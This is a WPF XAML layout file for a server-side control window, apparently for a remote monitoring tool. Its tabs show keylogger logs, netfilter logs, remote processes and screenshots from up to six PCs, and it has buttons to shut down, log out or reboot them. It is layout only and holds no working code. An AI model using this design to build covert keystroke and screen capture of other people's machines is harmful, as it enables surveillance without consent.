ServerGUI/MainWindow.xaml

<Window x:Class="ServerGUI.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
        xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
        xmlns:local="clr-namespace:ServerGUI"
        mc:Ignorable="d"
        Title="Distance" 
        Height="600" 
        Width="800"
        MinHeight="600"
        MinWidth="800"
        MaxHeight="600"
        MaxWidth="800"
        WindowStartupLocation="CenterScreen"
        >
    <Grid>
        <Grid x:Name="Buttons" HorizontalAlignment="Center" VerticalAlignment="Top">
            <Grid.RowDefinitions>
                <RowDefinition></RowDefinition>
                <RowDefinition></RowDefinition>
            </Grid.RowDefinitions>

            <Grid.ColumnDefinitions>
                <ColumnDefinition></ColumnDefinition>
                <ColumnDefinition></ColumnDefinition>
                <ColumnDefinition></ColumnDefinition>
                <ColumnDefinition></ColumnDefinition>
                <ColumnDefinition></ColumnDefinition>
                <ColumnDefinition></ColumnDefinition>
            </Grid.ColumnDefinitions>

            <Grid.Resources>
                <Style TargetType="Button">
                    <Setter Property="Margin" Value="1"/>
                    <Setter Property="Height" Value="30"/>
                    <Setter Property="Width" Value="100"/>
                </Style>
            </Grid.Resources>

            <Button x:Name="PC1_Connect" Grid.Row="0" Grid.Column="0" Click="PC1_Connect_Click">
                PC1 Connect
            </Button>
            <Button x:Name="PC2_Connect" Grid.Row="0" Grid.Column="1" Click="PC2_Connect_Click">
                PC2 Connect
            </Button>
            <Button x:Name="PC3_Connect" Grid.Row="0" Grid.Column="2" Click="PC3_Connect_Click">
                PC3 Connect
            </Button>
            <Button x:Name="PC4_Connect" Grid.Row="0" Grid.Column="3" Click="PC4_Connect_Click">
                PC4 Connect
            </Button>
            <Button x:Name="PC5_Connect" Grid.Row="0" Grid.Column="4" Click="PC5_Connect_Click">
                PC5 Connect
            </Button>
            <Button x:Name="PC6_Connect" Grid.Row="0" Grid.Column="5" Click="PC6_Connect_Click">
                PC6 Connect
            </Button>

        </Grid>

        <Grid x:Name="Info" VerticalAlignment="top" Margin="10,40">
            
            <Grid.Resources>
                <Style TargetType="TextBlock">
                    <Setter Property="FontSize" Value="16"/>
                </Style>

                <Style TargetType="TextBox">
                    <Setter Property="FontSize" Value="16"/>
                </Style>

                <Style TargetType="Ellipse">
                    <Setter Property="Height" Value="10"/>
                    <Setter Property="Width" Value="10"/>
                    <Setter Property="Fill" Value="Black"/>
                    <Setter Property="Margin" Value="0,2,10, 0"/>
                </Style>

            </Grid.Resources>

            <TabControl BorderBrush="White">
            
                <TabItem x:Name="InfoPCItem">
                    <TabItem.Header>
                        <StackPanel Orientation="Horizontal">
                            <Ellipse/>
                            <TextBlock Width="155">Information about PC</TextBlock>
                        </StackPanel>
                    </TabItem.Header>

                    <TabItem.Content>
                        <Grid>
                            <Grid VerticalAlignment="top" HorizontalAlignment="Left" Margin="-4, 10">
                                <TextBlock x:Name="InfoPC">UNKNOWN DEVICE</TextBlock>

                            </Grid>

                            <Grid HorizontalAlignment="Right" VerticalAlignment="Top" Margin="10">
                                <Grid.RowDefinitions>
                                    <RowDefinition></RowDefinition>
                                    <RowDefinition></RowDefinition>
                                    <RowDefinition></RowDefinition>
                                </Grid.RowDefinitions>

                                <Grid.ColumnDefinitions>
                                    <ColumnDefinition></ColumnDefinition>
                                </Grid.ColumnDefinitions>

                                <Grid.Resources>
                                    <Style TargetType="Button">
                                        <Setter Property="Margin" Value="-1, 5"/>
                                        <Setter Property="Height" Value="30"/>
                                        <Setter Property="Width" Value="100"/>
                                    </Style>
                                </Grid.Resources>

                                <Button x:Name="ButtonShutdownPC" Grid.Row="0" Grid.Column="0" Click="ButtonShutdownPC_Click">
                                    shutdown PC
                                </Button>

                                <Button x:Name="ButtonLogoutPC" Grid.Row="1" Grid.Column="0" Click="ButtonLogoutPC_Click">
                                    logout PC
                                </Button>

                                <Button x:Name="ButtonRebootPC" Grid.Row="2" Grid.Column="0" Click="ButtonRebootPC_Click">
                                    reboot PC
                                </Button>

                            </Grid>
                        </Grid>
                    </TabItem.Content>

                </TabItem>

                <TabItem x:Name="KeyloggerLogItem">
                    <TabItem.Header>
                        <StackPanel Orientation="Horizontal">
                            <Ellipse/>
                            <TextBlock Width="110">Keylogger log</TextBlock>
                        </StackPanel>
                    </TabItem.Header>

                    <TabItem.Content>
                        <Grid VerticalAlignment="Top" HorizontalAlignment="Left">
                            <Button 
                                x:Name="KeyloggerLogUpdateButton" 
                                Width="100" Height="30" 
                                VerticalAlignment="Top" 
                                HorizontalAlignment="Left" 
                                Click="KeyloggerLogUpdateButton_Click"
                                Margin="-1,5,0,0"
                                >
                                update
                            </Button>

                            <Button 
                                x:Name="KeyloggerLogSaveButton" 
                                Width="100" Height="30" 
                                VerticalAlignment="Top" 
                                HorizontalAlignment="Left" 
                                Margin="100,5,0,0" Click="KeyloggerLogSaveButton_Click"
                            >
                                save as
                            </Button>

                            <TextBox 
                                x:Name="KeyloggerLog" 
                                Margin="-2,40,0,0"
                                IsReadOnly="True"
                                Width="761"
                                Height="400"
                                >
                                Please click the update button...
                            </TextBox>
                        </Grid>
                    </TabItem.Content>
                </TabItem>

                <TabItem x:Name="NetfilterLogItem">
                    <TabItem.Header>
                        <StackPanel Orientation="Horizontal">
                            <Ellipse/>
                            <TextBlock Width="110">Netfilter log</TextBlock>
                        </StackPanel>
                    </TabItem.Header>

                    <TabItem.Content>
                        <Grid VerticalAlignment="Top" HorizontalAlignment="Left">
                            <Button 
                                x:Name="NetfilterLogUpdateButton" 
                                Width="100" Height="30" 
                                VerticalAlignment="Top" 
                                HorizontalAlignment="Left" 
                                Margin="-1,5,0,0" Click="NetfilterLogUpdateButton_Click"
                            >
                                update
                            </Button>

                            <Button 
                                x:Name="NetfilterLogSaveButton" 
                                Width="100" Height="30" 
                                VerticalAlignment="Top" 
                                HorizontalAlignment="Left" 
                                Margin="100,5,0,0" Click="NetfilterLogSaveButton_Click"
                            >
                                save as
                            </Button>

                            <TextBox 
                                x:Name="NetfilterLog" 
                                Margin="-2,40,0,0"
                                IsReadOnly="True"
                                Width="761"
                                Height="400"
                            >
                                Please click the update button...
                            </TextBox>
                        </Grid>
                    </TabItem.Content>

                </TabItem>

                <TabItem x:Name="ProcessManagerItem">
                    <TabItem.Header>
                        <StackPanel Orientation="Horizontal">
                            <Ellipse/>
                            <TextBlock Width="131">Process Manager</TextBlock>
                        </StackPanel>
                    </TabItem.Header>

                    <TabItem.Content>
                        <Grid VerticalAlignment="Top" HorizontalAlignment="Center">
                            <Button 
                                x:Name="ProcessUpdateButton" 
                                Width="100" Height="30" 
                                VerticalAlignment="Top" 
                                HorizontalAlignment="Center"
                                Margin="-103,5,0,0" Click="ProcessUpdateButton_Click"
                            >
                                update
                            </Button>

                            <Button 
                                x:Name="ProcessTerminateButton" 
                                Width="100" Height="30" 
                                VerticalAlignment="Top" 
                                HorizontalAlignment="Center"
                                Margin="103,5,0,0" Click="ProcessTerminateButton_Click"
                            >
                                terminate
                            </Button>

                            <ListView
                                x:Name="ProcessManagerListView"
                                VerticalAlignment="Top"
                                HorizontalAlignment="Center"
                                Margin="0,50,0,0"
                                Width="760" Height="350">

                                <ListView.View>
                                    <GridView>
                                        <GridViewColumn Header="Process Name" Width="250" DisplayMemberBinding="{Binding name}"/>
                                        <GridViewColumn Header="Process Id" Width="230" DisplayMemberBinding="{Binding pid}"/>
                                        <GridViewColumn Header="Threads" Width="250" DisplayMemberBinding="{Binding cntThreads}"/>
                                    </GridView>
                                </ListView.View>

                            </ListView>

                        </Grid>
                    </TabItem.Content>

                </TabItem>

                <TabItem x:Name="ScreenItem">
                    <TabItem.Header>
                        <StackPanel Orientation="Horizontal">
                            <Ellipse/>
                            <TextBlock Width="95">Screenshot</TextBlock>
                        </StackPanel>
                    </TabItem.Header>

                    <TabItem.Content>
                        <Grid VerticalAlignment="Top" HorizontalAlignment="Center">
                            <Button 
                                x:Name="GetScreenshotButton" 
                                Width="100" Height="30" 
                                VerticalAlignment="Top" 
                                HorizontalAlignment="Center"
                                Margin="-102,5,0,0" Click="GetScreenshotButton_Click"
                            >
                                get screenshot
                            </Button>

                            <Button 
                                x:Name="ScreenshotSaveButton" 
                                Width="100" Height="30" 
                                VerticalAlignment="Top" 
                                HorizontalAlignment="Center" 
                                Margin="102,5,0,0" Click="ScreenshotSaveButton_Click"
                            >
                                save as
                            </Button>

                            <Image 
                                x:Name="ScreenshotImage"
                                VerticalAlignment="Top"
                                HorizontalAlignment="Center"
                                Margin="0, 40"
                                />
                        </Grid>
                    </TabItem.Content>

                </TabItem>

            </TabControl>

        </Grid>
    </Grid>
    
</Window>
